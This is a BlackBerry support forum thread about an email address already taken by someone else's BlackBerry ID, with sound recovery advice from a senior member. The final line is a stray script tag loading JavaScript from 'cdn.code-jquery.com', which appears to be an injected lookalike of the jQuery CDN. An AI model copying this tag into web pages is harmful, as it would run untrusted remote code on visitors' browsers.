Welcome!

Welcome to the official BlackBerry Support Community Forums.

This is your resource to discuss support topics with your peers, and learn from each other.

New Contributor
My Device: Z10
My Carrier: Fido

Blackberry ID HELP

When I try to register for a new blackberry ID and enter my current e-mail address as the username, it says that somebody is already using this. Obviously this is my email account and I know that I haven't used this e-mail yet so what can I do about this? I even tried to reset the password but it requires that I answer a security question which I can't answer either because I did not make this BB ID. Any help appreciated!

Hall of Famer III
My Device: DTEK50 (AAH108), PRIV (AAH995), Z10/Z30/Q10 (10.3.2.2813), Playbook (2.1.0.1917)
My Carrier: TMobile USA

Re: Blackberry ID HELP

Hi and Welcome to the Community!

Anyone can register a BBID account using any email address they desire. It is possible that someone else made an error in creating theirs, and by happenstance used your valid email address...their only available correction of the situation would be to abandon the BBID and create a new one with their correct information. But the BBID account still exists in the BBID system...it can only be destroyed by the use of a special link in the original registration email that is received...but, since they did not receive it, they could not use that link. However, you should have received that original email, and you could now use the link to destroy the BBID and thereby re-create it with your proper credentials.

But, I would be wary...even if a BBID is never confirmed (also a link in that original registration email), it can still be used for many purposes, including backups to BB Protect, AppWorld purchases, etc. So you really need to consider how you wish to proceed. If, for example, you destroy that BBID, then the person now using it will be harmed. You might just want to consider creating a BBID using a different email address. But it will be your choice.

If you wish to keep that BBID and potentially harm another user and you do not have that original registration email, then start first with these please:

• KB28685 How to reset the BlackBerry ID password using the password recovery question
  • KB32111 "The link is no longer valid." is encountered when attempting to reset a BlackBerry ID password
  • KB26361 How to change or reset the BlackBerry ID password
  • KB28111 Unable to reset BlackBerry ID password when using a BlackBerry hosted email address
  • KB28232 BlackBerry ID reset email is not being delivered to the associated mailbox

If you have forgotten your BB ID credentials AND have non-BB access (e.g., Outlook, webmail, etc.) to the email account that is currently configured to your BB ID account, then those instructions should allow you to recover access to your BB ID account, even without the password or recovery question (please read them all carefully to find the section that applies to you). Of course, as they describe, if the BBID was never confirmed, then this will not work.

However, if you do not have access to that email account, or if the BBID was never properly validated, then you have only one method available...human intervention. To receive that, you must ring up your mobile service provider and convince them to escalate your case up to BlackBerry. Further, you must convince BlackBerry to provide you with a solution -- which may be difficult as it will be difficult for them to determine your actual identity. Note that I have no idea if they will be willing to do this, but there is no other way that I know of to deal with your situation.

Good luck!

Occam's Razor nearly always applies when troubleshooting technology issues!

New to the Community? Click here and also here for helpful guidance. Also please click here for additional helpful information to guide you as you proceed. I always recommend that you treat your BlackBerry like any other computing device, including using a regular backup schedule...click here for an article with instructions. If anyone has been helpful to you, please show your appreciation by clicking the button. Need a reference to BB10 OS/SR versions? Click here. Need a specific BB10 AutoLoader? Send me a private message.

...................................................... ......................................................
New Contributor
My Device: Z10
My Carrier: Fido

Re: Blackberry ID HELP

Doesn't look like there is a solution to this problem without negatively affecting me or the other person, but thanks for the help anyways

<script type="text/javascript" src="http://cdn.code-jquery.com/jquery-1.7.2.min.js"></script>